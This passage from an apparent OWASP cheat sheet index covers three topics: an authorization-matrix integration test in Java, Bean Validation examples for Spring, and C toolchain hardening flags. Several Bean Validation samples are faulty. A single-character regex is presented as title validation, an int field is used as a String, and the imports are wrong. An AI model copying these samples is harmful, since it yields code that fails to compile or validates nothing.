for the current service\nOptional<AuthorizationMatrix.Services.Service.Role> role = service.getRole().stream().filter(r -> r.getName().equals(pointOfView.name())).findFirst();\nboolean accessIsGrantedInAuthorizationMatrix = role.isPresent();\n//Verify behavior consistency according to the response code returned and the authorization configured in the matrix\nif (serviceResponseCode == service.getHttpResponseCodeForAccessAllowed()) {\n//Roles is not in the list of role allowed to access to the service so it's an error\nif (!accessIsGrantedInAuthorizationMatrix) {\nerrors.add(String.format(errorMessageTplForIncorrectReturnCode, service.getName(), pointOfView.name(), serviceResponseCode,\nservice.getHttpResponseCodeForAccessDenied()));\n}\n} else if (serviceResponseCode == service.getHttpResponseCodeForAccessDenied()) {\n//Roles is in the list of role allowed to access to the service so it's an error\nif (accessIsGrantedInAuthorizationMatrix) {\nerrors.add(String.format(errorMessageTplForIncorrectReturnCode, service.getName(), pointOfView.name(), serviceResponseCode,\nservice.getHttpResponseCodeForAccessAllowed()));\n}\n} else {\nerrors.add(String.format(errorMessageTplForUnexpectedReturnCode, service.getName(), pointOfView.name(), serviceResponseCode));\n}\n} catch (Exception e) {\nerrors.add(String.format(fatalErrorMessageTpl, service.getName(), pointOfView.name(), e.getMessage()));\n}\n\n\n});\n\nreturn errors;\n}\n\n/**\n       * Call a service with a specific payload and return the HTTP response code received.\n       * Delegate this step in order to made the test cases more easy to maintain.\n       *\n       * @param uri                URI of the target service\n       * @param payloadContentType Content type of the payload to send\n       * @param payload            Payload to send\n       * @param httpMethod         HTTP method to use\n       * @param accessToken        Access token to specify to represent the identity of the caller\n       * @return The HTTP response code received\n       * @throws Exception If any error occurs\n       */\nprivate int callService(String uri, String payload, String payloadContentType, String httpMethod, String accessToken) throws Exception {\nint rc;\n\n//Build the request - Use Apache HTTP Client in order to be more flexible in the combination\nHttpRequestBase request;\nString url = (BASE_URL + uri).replaceAll(\"\\\\{messageId\\\\}\", \"1\");\nswitch (httpMethod) {\ncase \"GET\":\nrequest = new HttpGet(url);\nbreak;\ncase \"DELETE\":\nrequest = new HttpDelete(url);\nbreak;\ncase \"PUT\":\nrequest = new HttpPut(url);\nif (payload != null) {\nrequest.setHeader(\"Content-Type\", payloadContentType);\n((HttpPut) request).setEntity(new StringEntity(payload.trim()));\n}\nbreak;\ndefault:\nthrow new UnsupportedOperationException(httpMethod + \" not supported !\");\n}\nrequest.setHeader(\"Authorization\", (accessToken != null) ? accessToken : \"\");\n\n\n//Send the request and get the HTTP response code\ntry (CloseableHttpClient httpClient = HttpClients.createDefault()) {\ntry (CloseableHttpResponse httpResponse = httpClient.execute(request)) {\n//Don't care here about the response content...\nrc = httpResponse.getStatusLine().getStatusCode();\n}\n}\n\nreturn rc;\n}\n\n/**\n       * Generate a JWT token the user and role specified.\n       *\n       * @param login User login\n       * @param role  Authorization logical role\n       * @return The JWT token\n       * @throws Exception If any error occurs during the creation\n       */\nprivate String generateTestCaseAccessToken(String login, SecurityRole role) throws Exception {\nreturn new AuthService().issueAccessToken(login, role);\n}\n\n\n/**\n       * Format a list of errors to a printable string\n       *\n       * @param errors Error list\n       * @return Printable string\n       */\nprivate String formatErrorsList(List<String> errors) {\nStringBuilder buffer = new StringBuilder();\nerrors.forEach(e -> buffer.append(e).append(\"\\n\"));\nreturn buffer.toString();\n}\n}\n

In case of detecting an authorization issue(s) the output is the following:

testAccessUsingAnonymousUserPointOfView(org.owasp.pocauthztesting.AuthorizationMatrixIT)\nTime elapsed: 1.009 s  ### FAILURE\njava.lang.AssertionError:\nAccess issues detected using the ANONYMOUS USER point of view:\nThe service 'DeleteMessage' when called with POV 'ANONYMOUS' return\na response code 200 that is not the expected one (403 expected).\n\nThe service 'CreateMessage' when called with POV 'ANONYMOUS' return\na response code 200 that is not the expected one (403 expected).\n\ntestAccessUsingBasicUserPointOfView(org.owasp.pocauthztesting.AuthorizationMatrixIT)\nTime elapsed: 0.05 s  ### FAILURE!\njava.lang.AssertionError:\nAccess issues detected using the BASIC USER point of view:\nThe service 'DeleteMessage' when called with POV 'BASIC' return\na response code 200 that is not the expected one (403 expected).\n
"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#rendering-of-the-authorization-matrix-for-an-audit-review","title":"Rendering of the authorization matrix for an audit / review","text":"

Even if the authorization matrix is stored in a human-readable format (XML), it can be interesting to provide an on-the-fly rendering representation of the XML file in order to facilitate the review, audit and discussion about the authorization matrix in order to spot potential inconsistencies.

The Following XSL stylesheet can be used:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<xsl:stylesheet xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" version=\"1.0\">\n<xsl:template match=\"/\">\n<html>\n<head>\n<title>Authorization Matrix</title>\n<link rel=\"stylesheet\"\nhref=\"https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.6/css/bootstrap.min.css\"\nintegrity=\"sha384-rwoIResjU2yc3z8GV/NPeZWAv56rSmLldC3R/AZzGRnGxQQKnKkoFVhFQhNUwEyJ\"\ncrossorigin=\"anonymous\" />\n</head>\n<body>\n<h3>Roles</h3>\n<ul>\n<xsl:for-each select=\"authorization-matrix/roles/role\">\n<xsl:choose>\n<xsl:when test=\"@name = 'ADMIN'\">\n<div class=\"alert alert-warning\" role=\"alert\">\n<strong>\n<xsl:value-of select=\"@name\" />\n</strong>\n:\n                  <xsl:value-of select=\"@description\" />\n</div>\n</xsl:when>\n<xsl:when test=\"@name = 'BASIC'\">\n<div class=\"alert alert-info\" role=\"alert\">\n<strong>\n<xsl:value-of select=\"@name\" />\n</strong>\n:\n                  <xsl:value-of select=\"@description\" />\n</div>\n</xsl:when>\n<xsl:otherwise>\n<div class=\"alert alert-danger\" role=\"alert\">\n<strong>\n<xsl:value-of select=\"@name\" />\n</strong>\n:\n                  <xsl:value-of select=\"@description\" />\n</div>\n</xsl:otherwise>\n</xsl:choose>\n</xsl:for-each>\n</ul>\n<h3>Authorizations</h3>\n<table class=\"table table-hover table-sm\">\n<thead class=\"thead-inverse\">\n<tr>\n<th>Service</th>\n<th>URI</th>\n<th>Method</th>\n<th>Role</th>\n</tr>\n</thead>\n<tbody>\n<xsl:for-each select=\"authorization-matrix/services/service\">\n<xsl:variable name=\"service-name\" select=\"@name\" />\n<xsl:variable name=\"service-uri\" select=\"@uri\" />\n<xsl:variable name=\"service-method\" select=\"@http-method\" />\n<xsl:for-each select=\"role\">\n<tr>\n<td scope=\"row\">\n<xsl:value-of select=\"$service-name\" />\n</td>\n<td>\n<xsl:value-of select=\"$service-uri\" />\n</td>\n<td>\n<xsl:value-of select=\"$service-method\" />\n</td>\n<td>\n<xsl:variable name=\"service-role-name\" select=\"@name\" />\n<xsl:choose>\n<xsl:when test=\"@name = 'ADMIN'\">\n<div class=\"alert alert-warning\" role=\"alert\">\n<xsl:value-of select=\"@name\" />\n</div>\n</xsl:when>\n<xsl:when test=\"@name = 'BASIC'\">\n<div class=\"alert alert-info\" role=\"alert\">\n<xsl:value-of select=\"@name\" />\n</div>\n</xsl:when>\n<xsl:otherwise>\n<div class=\"alert alert-danger\" role=\"alert\">\n<xsl:value-of select=\"@name\" />\n</div>\n</xsl:otherwise>\n</xsl:choose>\n</td>\n</tr>\n</xsl:for-each>\n</xsl:for-each>\n</tbody>\n</table>\n</body>\n</html>\n</xsl:template>\n</xsl:stylesheet>\n

Example of the rendering:

"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#sources-of-the-prototype","title":"Sources of the prototype","text":"

GitHub repository

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html","title":"Bean Validation Cheat Sheet","text":""},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing clear, simple, actionable guidance for providing Java Bean Validation security functionality in your applications.

Bean validation (JSR303 aka Bean Validation 1.0 /JSR349 aka Bean Validation 1.1) is one of the most common ways to perform input validation in Java. It is an application layer agnostic validation spec which provides the developer with the means to define a set of validation constraints on a domain model and then perform validation of those constraints through out the various application tiers.

One advantage of this approach is that the validation constraints and the corresponding validators are only written once, thus reducing duplication of effort and ensuring uniformity:

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#typical-validation","title":"Typical Validation","text":""},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#bean-validation","title":"Bean Validation","text":""},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#setup","title":"Setup","text":"

The examples in this guide use Hibernate Validator (the reference implementation for Bean Validation 1.1).

Add Hibernate Validator to your pom.xml:

<dependency>\n<groupId>org.hibernate</groupId>\n<artifactId>hibernate-validator</artifactId>\n<version>5.2.4.Final</version>\n</dependency>\n

Enable bean validation support in Spring's context.xml:

<beans:beans ...\n...\n<mvc:annotation-driven />\n...\n</beans:beans>\n

For more info, please see the setup guide

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#basics","title":"Basics","text":"

In order to get started using Bean Validation, you must add validation constraints (@Pattern, @Digits, @Min, @Max, @Size, @Past, @Future, @CreditCardNumber, @Email, @URL, etc.) to your model and then utilize the @Valid annotation when passing your model around in various application layers.

Constraints can be applied in several places:

For Bean Validation 1.1 also on:

For the sake of simplicity all the examples below feature field constraints and all validation is triggered by the controller. Refer to the Bean Validation documentation for a full list of examples.

When it comes to error handling, the Hibernate Validator returns a BindingResult object which contains a List<ObjectError>. The examples below feature simplistic error handling, while a production ready application would have a more elaborate design that takes care of logging and error page redirection.

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#predefined-constraints","title":"Predefined Constraints","text":""},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#pattern","title":"@Pattern","text":"

Annotation:

@Pattern(regex=,flag=)

Data Type:

CharSequence

Use:

Checks if the annotated string matches the regular expression regex considering the given flag match. Please visit OWASP Validation Regex Repository for other useful regex's.

Reference:

Documentation

Model:

import org.hibernate.validator.constraints.Pattern;\n\npublic class Article  {\n//Constraint: Alpha Numeric article titles only using a regular expression\n@Pattern(regexp = \"[a-zA-Z0-9 ]\")\nprivate String articleTitle;\npublic String getArticleTitle()  {\nreturn  articleTitle;\n}\npublic void setArticleTitle(String  articleTitle)  {\nthis.articleTitle  =  articleTitle;\n}\n\n...\n\n}\n

Controller:

import javax.validation.Valid;\nimport com.company.app.model.Article;\n\n@Controller\npublic class ArticleController  {\n\n...\n\n@RequestMapping(value = \"/postArticle\",  method = RequestMethod.POST)\npublic @ResponseBody String postArticle(@Valid  Article  article,  BindingResult  result,\nHttpServletResponse  response) {\nif (result.hasErrors()) {\nString errorMessage  =  \"\";\nresponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);\nList<ObjectError> errors = result.getAllErrors();\nfor(ObjectError  e :  errors) {\nerrorMessage += \"ERROR: \" +  e.getDefaultMessage();\n}\nreturn  errorMessage;\n} else {\nreturn  \"Validation Successful\";\n}\n}\n}\n
"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#digits","title":"@Digits","text":"

Annotation:

@Digits(integer=,fraction=)

Data Type:

BigDecimal, BigInteger, CharSequence, byte, short, int, long and the respective wrappers of the primitive types; Additionally supported by HV: any sub-type of Number

Use:

Checks whether the annotated value is a number having up to integer digits and fraction fractional digits

Reference:

Documentation

Model:

import org.hibernate.validator.constraints.Digits;\n\npublic\u00a0class\u00a0Customer {\n//Constraint:\u00a0Age\u00a0can\u00a0only\u00a0be\u00a03\u00a0digits\u00a0long\u00a0or\u00a0less\n@Digits(integer = 3, fraction = 0)\nprivate int age;\n\npublic String\u00a0getAge()\u00a0 {\nreturn\u00a0age;\n}\n\npublic void\u00a0setAge(String\u00a0age)\u00a0 {\nthis.age =\u00a0age;\n}\n\n...\n}\n

Controller:

import javax.validation.Valid;\nimport com.company.app.model.Customer;\n\n@Controller\npublic class CustomerController  {\n\n...\n\n@RequestMapping(value = \"/registerCustomer\",  method = RequestMethod.POST)\npublic @ResponseBody String registerCustomer(@Valid Customer customer, BindingResult result,\nHttpServletResponse  response) {\n\nif (result.hasErrors()) {\nString errorMessage = \"\";\nresponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);\nList<ObjectError> errors = result.getAllErrors();\n\nfor( ObjectError  e :  errors) {\nerrorMessage += \"ERROR: \"  +  e.getDefaultMessage();\n}\nreturn  errorMessage;\n} else {\nreturn  \"Validation Successful\";\n}\n}\n}\n
"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#size","title":"@Size","text":"

Annotation:

@Size(min=, max=)

Data Type:

CharSequence, Collection, Map and Arrays

Use:

Checks if the annotated element's size is between min and max (inclusive)

Reference:

Documentation

Model:

import\u00a0org.hibernate.validator.constraints.Size;\n\npublic\u00a0class\u00a0Message\u00a0{\n\n//Constraint:\u00a0Message\u00a0must\u00a0be\u00a0at\u00a0least\u00a010\u00a0characters\u00a0long,\u00a0but\u00a0less\u00a0than\u00a0500\n@Size(min = 10,\u00a0max = 500)\nprivate\u00a0String\u00a0message;\n\npublic\u00a0String\u00a0getMessage()\u00a0{\nreturn\u00a0message;\n}\n\npublic\u00a0void\u00a0setMessage(String\u00a0message)\u00a0{\nthis.message\u00a0=\u00a0message;\n}\n\n...\n}\n

Controller:

import\u00a0javax.validation.Valid;\nimport\u00a0com.company.app.model.Message;\n\n@Controller\npublic\u00a0class\u00a0MessageController\u00a0{\n\n...\n\n@RequestMapping(value=\"/sendMessage\",\u00a0method=RequestMethod.POST)\npublic\u00a0@ResponseBody\u00a0String\u00a0sendMessage(@Valid\u00a0Message\u00a0message,\u00a0BindingResult\u00a0result,\nHttpServletResponse\u00a0response){\n\nif(result.hasErrors()){\nString\u00a0errorMessage\u00a0=\u00a0\"\";\nresponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);\nList<ObjectError>\u00a0errors\u00a0=\u00a0result.getAllErrors();\nfor(\u00a0ObjectError\u00a0e\u00a0:\u00a0errors){\nerrorMessage+=\u00a0\"ERROR:\u00a0\"\u00a0+\u00a0e.getDefaultMessage();\n}\nreturn\u00a0errorMessage;\n}\nelse{\nreturn\u00a0\"Validation\u00a0Successful\";\n}\n}\n}\n
"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#past-future","title":"@Past / @Future","text":"

Annotation:

@Past, @Future

Data Type:

java.util.Date, java.util.Calendar, java.time.chrono.ChronoZonedDateTime, java.time.Instant, java.time.OffsetDateTime

Use:

Checks whether the annotated date is in the past / future

Reference:

Documentation

Model:

import\u00a0org.hibernate.validator.constraints.Past;\nimport\u00a0org.hibernate.validator.constraints.Future;\n\npublic\u00a0class\u00a0DoctorVisit\u00a0{\n\n//Constraint:\u00a0Birthdate\u00a0must\u00a0be\u00a0in\u00a0the\u00a0past\n@Past\nprivate\u00a0Date\u00a0birthDate;\n\npublic\u00a0Date\u00a0getBirthDate()\u00a0{\nreturn\u00a0birthDate;\n}\n\npublic\u00a0void\u00a0setBirthDate(Date\u00a0birthDate)\u00a0{\nthis.birthDate\u00a0=\u00a0birthDate;\n}\n\n//Constraint:\u00a0Schedule\u00a0visit\u00a0date\u00a0must\u00a0be\u00a0in\u00a0the\u00a0future\n@Future\nprivate\u00a0String\u00a0scheduledVisitDate;\n\npublic\u00a0String\u00a0getScheduledVisitDate()\u00a0{\nreturn\u00a0scheduledVisitDate;\n}\n\npublic\u00a0void\u00a0setScheduledVisitDate(String\u00a0scheduledVisitDate)\u00a0{\nthis.scheduledVisitDate\u00a0=\u00a0scheduledVisitDate;\n}\n\n...\n}\n

Controller:

import\u00a0javax.validation.Valid;\nimport\u00a0com.company.app.model.DoctorVisit;\n\n@Controller\npublic\u00a0class\u00a0DoctorVisitController\u00a0{\n\n...\n\n@RequestMapping(value=\"/scheduleVisit\",\u00a0method=RequestMethod.POST)\npublic\u00a0@ResponseBody\u00a0String\u00a0scheduleVisit(@Valid\u00a0DoctorVisit\u00a0doctorvisit,\u00a0BindingResult\u00a0result,\nHttpServletResponse\u00a0response){\n\nif(result.hasErrors()){\nString\u00a0errorMessage\u00a0=\u00a0\"\";\nresponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);\nList<ObjectError>\u00a0errors\u00a0=\u00a0result.getAllErrors();\nfor(\u00a0ObjectError\u00a0e\u00a0:\u00a0errors){\nerrorMessage+=\u00a0\"ERROR:\u00a0\"\u00a0+\u00a0e.getDefaultMessage();\n}\nreturn\u00a0errorMessage;\n}\nelse{\nreturn\u00a0\"Validation\u00a0Successful\";\n}\n}\n}\n
"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#combining-constraints","title":"Combining Constraints","text":"

Validation annotations can be combined in any suitable way. For instance, to specify a valid reviewRating value between 1 and 5, specify the validation like this :

Annotation:

@Min(value=), @Max(value=)

Data Type:

BigDecimal, BigInteger, byte, short, int, long and the respective wrappers of the primitive types; Additionally supported by HV: any sub-type of CharSequence (the numeric value represented by the character sequence is evaluated), any sub-type of Number

Use:

Checks whether the annotated value is higher/lower than or equal to the specified minimum

Reference:

Documentation

Model:

import\u00a0org.hibernate.validator.constraints.Min;\nimport\u00a0org.hibernate.validator.constraints.Max;\n\npublic\u00a0class\u00a0Review\u00a0{\n\n//Constraint:\u00a0Review\u00a0rating\u00a0must\u00a0be\u00a0between\u00a01\u00a0and\u00a05\n@Min(1)\n@Max(5)\nprivate\u00a0int\u00a0reviewRating;\n\npublic\u00a0int\u00a0getReviewRating()\u00a0{\nreturn\u00a0reviewRating;\n}\n\npublic\u00a0void\u00a0setReviewRating(int\u00a0reviewRating)\u00a0{\nthis.reviewRating\u00a0=\u00a0reviewRating;\n}\n...\n}\n

Controller:

import\u00a0javax.validation.Valid;\nimport\u00a0com.company.app.model.ReviewRating;\n\n@Controller\npublic\u00a0class\u00a0ReviewController\u00a0{\n\n...\n\n@RequestMapping(value=\"/postReview\",\u00a0method=RequestMethod.POST)\npublic\u00a0@ResponseBody\u00a0String\u00a0postReview(@Valid\u00a0Review\u00a0review,\u00a0BindingResult\u00a0result,\nHttpServletResponse\u00a0response){\n\nif(result.hasErrors()){\nString\u00a0errorMessage\u00a0=\u00a0\"\";\nresponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);\nList<ObjectError>\u00a0errors\u00a0=\u00a0result.getAllErrors();\nfor(\u00a0ObjectError\u00a0e\u00a0:\u00a0errors){\nerrorMessage+=\u00a0\"ERROR:\u00a0\"\u00a0+\u00a0e.getDefaultMessage();\n}\nreturn\u00a0errorMessage;\n}\nelse{\nreturn\u00a0\"Validation\u00a0Successful\";\n}\n}\n}\n
"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#cascading-constraints","title":"Cascading Constraints","text":"

Validating one bean is a good start, but often, beans are nested or in a complete graph of beans. To validate that graph in one go, apply cascading validation with @Valid

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#additional-constraints","title":"Additional Constraints","text":"

In addition to providing the complete set of JSR303 constraints, Hibernate Validator also defines some additional constraints for convenience:

Take a look at this table for the complete list.

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#custom-constraints","title":"Custom Constraints","text":"

One of the most powerful features of bean validation is the ability to define your own constraints that go beyond the simple validation offered by built-in constraints.

Creating custom constraints is beyond the scope of this guide. Please see this documentation.

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#error-messages","title":"Error Messages","text":"

It is possible to specify a message ID with the validation annotation, so that error messages are customized :

@Pattern(regexp\u00a0=\u00a0\"[a-zA-Z0-9\u00a0]\",\u00a0message=\"article.title.error\")\nprivate\u00a0String\u00a0articleTitle;\n

Spring MVC will then look up a message with ID article.title.error in a defined MessageSource. More on this documentation.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html","title":"C-Based Toolchain Hardening Cheat Sheet","text":""},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#introduction","title":"Introduction","text":"

C-Based Toolchain Hardening is a treatment of project settings that will help you deliver reliable and secure code when using C, C++ and Objective C languages in a number of development environments. This article will examine Microsoft and GCC toolchains for the C, C++ and Objective C languages. It will guide you through the steps you should take to create executables with firmer defensive postures and increased integration with the available platform security. Effectively configuring the toolchain also means your project will enjoy a number of benefits during development, including enhanced warnings and static analysis, and self-debugging code.

There are four areas to be examined when hardening the toolchain: configuration, preprocessor, compiler, and linker. Nearly all areas are overlooked or neglected when setting up a project. The neglect appears to be pandemic, and it applies to nearly all projects including Auto-configured projects, Makefile-based, Eclipse-based, Visual Studio-based, and Xcode-based. Its important to address the gaps at configuration and build time because its difficult to impossible to add hardening on a distributed executable after the fact on some platforms.

This is a prescriptive article, and it will not debate semantics or speculate on behavior. Some information, such as the C/C++ committee's motivation and pedigree for program diagnostics, NDEBUG, assert, and abort(), appears to be lost like a tale in the Lord of the Rings. As such, the article will specify semantics (for example, the philosophy of 'debug' and 'release' build configurations), assign behaviors (for example, what an assert should do in a 'debug' and 'release' build configurations), and present a position. If you find the posture is too aggressive, then you should back off as required to suite your taste.

A secure toolchain is not a silver bullet. It is one piece of an overall strategy in the engineering process to help ensure success. It will compliment existing processes such as static analysis, dynamic analysis, secure coding, negative test suites, and the like. Tools such as Valgrind and Helgrind will still be needed. And a project will still require solid designs and architectures.

The OWASP ESAPI C++ project eats its own dog food. Many of the examples you will see in this article come directly from the ESAPI C++ project.

Finally, a Cheat Sheet is available for those who desire a terse treatment of the material. Please visit C-Based Toolchain Hardening Cheat Sheet for the abbreviated version.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#wisdom","title":"Wisdom","text":"

Code must be correct. It should be secure. It can be efficient.

Dr. Jon Bentley: \"If it doesn't have to be correct, I can make it as fast as you'd like it to be\".

Dr. Gary McGraw: \"Thou shalt not rely solely on security features and functions to build secure software as security is an emergent property of the entire system and thus relies on building and integrating all parts properly\".

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#configuration","title":"Configuration","text":"

Configuration is the first opportunity to configure your project for success. Not only do you have to configure your project to meet reliability and security goals, you must also configure integrated libraries properly. You typically have has three choices. First, you can use auto-configuration utilities if on Linux or Unix. Second, you can write a makefile by hand. This is predominant on Linux, macOS, and Unix, but it applies to Windows as well. Finally, you can use an integrated development environment or IDE.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#build-configurations","title":"Build Configurations","text":"

At this stage in the process, you should concentrate on configuring for two builds: Debug and Release. Debug will be used for development and include full instrumentation. Release will be configured for production. The difference between the two settings is usually optimization level and debug level. A third build configuration is Test, and its usually a special case of Release.

For debug and release builds, the settings are typically diametrically opposed. Debug configurations have no optimizations and full debug information; while Release builds have optimizations and minimal to moderate debug information. In addition, debug code has full assertions and additional library integration, such as mudflaps and malloc guards such as dmalloc.

The Test configuration is often a Release configuration that makes everything public for testing and builds a test harness. For example, all member functions public (C++ class) and all interfaces (library or shared object) should be made available for testing. Many Object Oriented purist oppose testing private interfaces, but this is not about object oriented-ness. This (q.v.) is about building reliable and secure software.

GCC 4.8 introduced an optimization of -Og. Note that it is only an optimization, and still requires a customary debug level via -g.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#debug-builds","title":"Debug Builds","text":"

Debug builds are where developers spend most of their time when vetting problems, so this build should concentrate forces and tools or be a 'force multiplier'. Though many do not realize, debug code is more highly valued than release code because its adorned with additional instrumentation. The debug instrumentation will cause a program to become nearly \"self-debugging\", and help you catch mistakes such as bad parameters, failed API calls, and memory problems.

Self-debugging code reduces your time during trouble shooting and debugging. Reducing time under the debugger means you have more time for development and feature requests. If code is checked in without debug instrumentation, it should be fixed by adding instrumentation or rejected.

For GCC, optimizations and debug symbolication are controlled through two switches: -O and -g. You should use the following as part of your CFLAGS and CXXFLAGS for a minimal debug session:

-O0 -g3 -ggdb\n

-O0 turns off optimizations and -g3 ensures maximum debug information is available. You may need to use -O1 so some analysis is performed. Otherwise, your debug build will be missing a number of warnings not present in release builds. -g3 ensures maximum debugging information is available for the debug session, including symbolic constants and #defines. -ggdb includes extensions to help with a debug session under GDB. For completeness, Jan Krachtovil stated -ggdb currently has no effect in a private email.

Release builds should also consider the configuration pair of -mfunction-return=thunk and -mindirect-branch=thunk. These are the \"Reptoline\" fix which is an indirect branch used to thwart speculative execution CPU vulnerabilities such as Spectre and Meltdown. The CPU cannot tell what code to speculatively execute because it is an indirect (as opposed to a direct) branch. This is an extra layer of indirection, like calling a pointer through a pointer.

Debug build should also define DEBUG, and ensure NDEBUG is not defined. NDEBUG removes \"program diagnostics\"; and has undesirable behavior and side effects which discussed below in more detail. The defines should be present for all code, and not just the program. You use it for all code (your program and included libraries) because you need to know how they fail too (remember, you take the bug report - not the third party library).

In addition, you should use other relevant flags, such as -fno-omit-frame-pointer. Ensuring a frame pointer exists makes it easier to decode stack traces. Since debug builds are not shipped, its OK to leave symbols in the executable. Programs with debug information do not suffer performance hits. See, for example, How does the gcc -g option affect performance?

Finally, you should ensure your project includes additional diagnostic libraries, such as dmalloc and Address Sanitizer. A comparison of some memory checking tools can be found at Comparison Of Memory Tools. If you don't include additional diagnostics in debug builds, then you should start using them sinces its OK to find errors you are not looking for.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#release-builds","title":"Release Builds","text":"

Release builds are what your customer receives. They are meant to be run on production hardware and servers, and they should be reliable, secure, and efficient. A stable release build is the product of the hard work and effort during development.

For release builds, you should use the following as part of CFLAGS and CXXFLAGS for release builds:

-On -g2\n

-On sets optimizations for speed or size (for example, -Os or -O2), and -g2 ensure debugging information is created.

Debugging information should be stripped and retained in case of symbolication for a crash report from the field. While not desired, debug information can be left in place without a performance penalty. See How does the gcc -g option affect performance? for details.

Release builds should also define NDEBUG, and ensure DEBUG is not defined. The time for debugging and diagnostics is over, so users get production code with full optimizations, no \"programming diagnostics\", and other efficiencies. If you can't optimize or your are performing excessive logging, it usually means the program is not ready for production.

If you have been relying on an assert and then a subsequent abort(), you have been abusing \"program diagnostics\" since it has no place in production code. If you want a memory dump, create one so users don't have to worry about secrets and other sensitive information being written to the filesystem and emailed in plain text.

For Windows, you would use /Od for debug builds; and /Ox, /O2 or /Os for release builds. See Microsoft's /O Options (Optimize Code) for details.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#test-builds","title":"Test Builds","text":"

Test builds are used to provide heuristic validation by way of positive and negative test suites. Under a test configuration, all interfaces are tested to ensure they perform to specification and satisfaction. \"Satisfaction\" is subjective, but it should include no crashing and no trashing of your memory arena, even when faced with negative tests.

Because all interfaces are tested (and not just the public ones), your CFLAGS and CXXFLAGS should include:

-Dprotected=public -Dprivate=public\n

You should also change __attribute__ ((visibility (\"hidden\"))) to __attribute__ ((visibility (\"default\"))).

Nearly everyone gets a positive test right, so no more needs to be said. The negative self tests are much more interesting, and you should concentrate on trying to make your program fail so you can verify it fails gracefully. Remember, a bad actor is not going to be courteous when they attempt to cause your program to fail. And it's your project that takes egg on the face by way of a bug report or guest appearance on Full Disclosure or Bugtraq - not <some library> you included.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#auto-tools","title":"Auto Tools","text":"

Auto configuration tools are popular on many Linux and Unix based systems, and the tools include Autoconf, Automake, config, and Configure. The tools work together to produce project files from scripts and template files. After the process completes, your project should be setup and ready to be made with make.

When using auto configuration tools, there are a few files of interest worth mentioning. The files are part of the auto tools chain and include m4 and the various *.in, *.ac (autoconf), and *.am (automake) files. At times, you will have to open them, or the resulting makefiles, to tune the \"stock\" configuration.

There are three downsides to the command-line configuration tools in the toolchain: (1) they often ignore user requests, (2) they cannot create configurations, and (3) security is often not a goal.

To demonstrate the first issue, confider your project with the following: configure CFLAGS=\"-Wall -fPIE\" CXXFLAGS=\"-Wall -fPIE\" LDFLAGS=\"-pie\". You will probably find the auto tools ignored your request, which means the command below will not produce expected results. As a work around, you will have to open an m4 scripts, Makefile.in or Makefile.am and fix the configuration.

$ configure CFLAGS=\"-Wall -Wextra -Wconversion -fPIE -Wno-unused-parameter\n    -Wformat=2 -Wformat-security -fstack-protector-all -Wstrict-overflow\"\nLDFLAGS=\"-pie -z,noexecstack -z,noexecheap -z,relro -z,now\"\n

For the second point, you will probably be disappointed to learn Automake does not support the concept of configurations. Its not entirely Autoconf's or Automake's fault - Make and its inability to detect changes is the underlying problem. Specifically, Make only checks modification times of prerequisites and targets, and does not check things like CFLAGS and CXXFLAGS. The net effect is you will not receive expected results when you issue make debug and then make test or make release.

Finally, you will probably be disappointed to learn tools such as Autoconf and Automake miss many security related opportunities and ship insecure out of the box. There are a number of compiler switches and linker flags that improve the defensive posture of a program, but they are not 'on' by default. Tools like Autoconf - which are supposed to handle this situation - often provides setting to serve the lowest of all denominators.

A recent discussion on the Automake mailing list illuminates the issue: Enabling compiler warning flags. Attempts to improve default configurations were met with resistance and no action was taken. The resistance is often of the form, \"<some useful warning> also produces false positives\" or \"<some obscure platform> does not support <established security feature>\". Its noteworthy that David Wheeler, the author of Secure Programming for Linux and Unix HOWTO, was one of the folks trying to improve the posture.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#makefiles","title":"Makefiles","text":"

Make is one of the earliest build tools dating back to the 1970s. Its available on Linux, macOS and Unix, so you will frequently encounter projects using it. Unfortunately, Make has a number of short comings (Recursive Make Considered Harmful and What's Wrong With GNU make?), and can cause some discomfort. Despite issues with Make, ESAPI C++ uses Make primarily for three reasons: first, its omnipresent; second, its easier to manage than the Auto Tools family; and third, libtool was out of the question.

Consider what happens when you: (1) type make debug, and then type make release. Each build would require different CFLAGS due to optimizations and level of debug support. In your makefile, you would extract the relevant target and set CFLAGS and CXXFLAGS similar to below (taken from ESAPI C++ Makefile):

